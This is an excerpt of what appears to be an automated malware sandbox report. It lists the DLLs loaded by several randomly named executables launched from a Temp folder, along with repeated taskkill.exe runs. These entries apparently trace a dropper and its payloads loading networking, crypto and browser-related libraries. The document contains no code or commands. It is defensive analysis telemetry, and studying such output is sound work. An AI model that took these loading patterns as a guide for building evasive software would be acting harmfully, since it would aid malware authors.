Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003895001\pisos23.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Section loaded: mozglue.dll
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Section loaded: vcruntime140.dll
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Section loaded: msvcp140.dll
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Section loaded: vcruntime140.dll
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Section loaded: pcacli.dll
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1003896001\3e169c0a7e.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1003898001\da069a4b00.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1003898001\da069a4b00.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1003898001\da069a4b00.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1003898001\da069a4b00.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1003898001\da069a4b00.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1003898001\da069a4b00.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1003898001\da069a4b00.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1003898001\da069a4b00.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1003898001\da069a4b00.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1003898001\da069a4b00.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1003898001\da069a4b00.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1003897001\7fb3e2a1d2.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1003899001\fe40c3a9a8.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1003899001\fe40c3a9a8.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1003899001\fe40c3a9a8.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1003899001\fe40c3a9a8.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1003899001\fe40c3a9a8.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1003899001\fe40c3a9a8.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1003899001\fe40c3a9a8.exe	Section loaded: version.dll
